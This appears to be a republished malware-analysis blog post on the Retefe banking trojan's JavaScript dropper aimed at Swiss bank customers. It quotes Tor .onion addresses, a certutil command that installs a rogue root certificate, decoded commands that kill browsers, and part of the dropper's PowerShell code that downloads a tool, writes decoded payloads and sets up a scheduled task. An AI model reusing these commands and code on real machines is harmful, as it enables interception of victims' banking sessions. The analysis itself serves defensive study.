A few days ago when I took a look to the latest Retefe campaign affecting Swiss financial Institutions, I did not have the time to take a deeper look to the malicious JSembeddedin the .docx file. So in this post I'll explain a bit about it. Particularly, I'm interested in understanding how the Proxifier tool is setup with a custom profile to forward the traffic through Tor. This tool is something Cyber Criminals have introduced recently, as previously they used a proxy PAC file which is setup in the registry key "HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\AutoConfigURL"

Last analysis about Retefe from Avast showsexactlythebehaviourdescribed above.

Retefe is not just affecting Swiss banks, but also other countries banks, like UK. So it might be that the custom proxy file is hardcoded into the malicious JS or dynamically this file is downloaded. So let's take a look to it.

(I have upload the malicious JS payload to VT )

The JS is obfuscated so I'm using Visual Studio to perform some debugging.

The first interesting thing I see are the Tor URLs defined bvq64y3wwg3zzguk.onion,v7yxqrahkza3ewuv.onion, cvxbceskbuvsic3i.onion, a7j7f3rqdvoe5bav.onion ,


Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...

Also, there is the fake Comodo CA which it used to avoid the browser SSL warnings. This is base64 encoded.


Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...

There is a PowerShell script to simulate the "click" to accept the import of the CA certificate.



Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...
Then there is a command to import the certificate

"certutil -addstore -f -user \"ROOT\" \""


and some base64encodedcommands to kill the browser running:
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...
"dGFza2tpbGwgL0YgL2ltIGlleHBsb3JlLmV4ZQ=="

taskkill /F /im iexplore.exe


"dGFza2tpbGwgL0YgL2ltIGZpcmVmb3guZXhl"

taskkill /F /im firefox.exe

"dGFza2tpbGwgL0YgL2ltIGNocm9tZS5leGU="

taskkill /F /im chrome.exe


So at this point the maliciouscertificatehas been imported and all the browsers, after killking them, have the COMODO CA maliciuos certificate in their CA chain
Debugging deeper, in the end, a temporal file is created which contains a PowerShell script the interesting stuff
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...

This is the code


function Unzip { param([string]$zipfile, [string]$destination); $7zaExe = Join-Path $env:Temp '7za.exe'; if (-NOT (Test-Path $7zaExe)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7zaExe); } Catch{} } if ($(Try { Test-Path $7zaExe.trim() } Catch { $false })){ Start-Process "$7zaExe" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function AddTask { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0); $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService; $td=$ts.NewTask(); $td.RegistrationInfo.Description = 'Does something'; $td.Settings.DisallowStartIfOnBatteries = $False; $td.Settings.StopIfGoingOnBatteries = $False; $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew; $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger

本文前端(javascript)相关术语:javascript是什么意思 javascript下载 javascript权威指南 javascript基础教程 javascript 正则表达式 javascript设计模式 javascript高级程序设计 精通javascript javascript教程

分页:12
转载请注明
本文标题:Malicious email campaign mimicking Swiss Financial Institutions: Retefe again (I ...
本站链接:http://www.codesec.net/view/484037.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 前端(javascript) | 评论(0) | 阅读(50)